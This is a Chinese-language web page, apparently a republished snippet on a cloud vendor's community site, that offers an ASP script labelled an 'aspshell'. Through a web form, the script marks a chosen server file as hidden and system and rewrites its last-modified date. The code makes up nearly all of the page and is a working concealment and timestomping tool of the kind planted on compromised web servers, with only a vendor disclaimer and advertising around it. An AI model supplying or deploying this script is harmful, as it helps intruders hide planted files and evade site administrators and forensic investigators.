隱藏修改檔案時間和檔案屬性的ASP指令碼

來源:互聯網
上載者:User

複製代碼 代碼如下:<%
'隱藏並修改檔案的最後修改時間的aspshell
'原理:通過FSO可以修改檔案的屬性,比如設定為唯讀,隱藏,系統等等;FSO中的attributes屬性修改檔案屬性,1隻讀,2隱藏,4系統檔案
' 通過shell.application可以給檔案重新設定一個最後修改時間
'2009/02/24 write by skyfire
response.write "<form method=post>"
response.write "路 徑:<input name=path value='"&server.mappath("/")&"' size='30'>(一定要以\結尾)<br />"
response.write "檔案名稱:<input name=filename value='test.txt' size='30'><br />"
response.write "修改時間:<input name=time value='12/30/2099 12:30:30' size='30'><br />"
response.write "<input type=submit value=修改並隱藏檔案>"
response.write "</form>"

'擷取提交的參數
set path=request.Form("path")
set fileName=request.Form("filename")
set newTime=request.Form("time")

if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then

'通過fso設定檔案屬性
Set fso=Server.CreateObject("Scripting.FileSystemObject")
Set file=fso.getFile(path&fileName)
file.attributes=2+4 '設定檔案屬性為隱藏+系統

'通過shell.Application修改檔案的最後修改時間
Set shell=Server.CreateObject("Shell.Application")
Set app_path=shell.NameSpace(server.mappath("."))
Set app_file=app_path.ParseName(fileName)
app_file.Modifydate=newTime

end if
%>

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.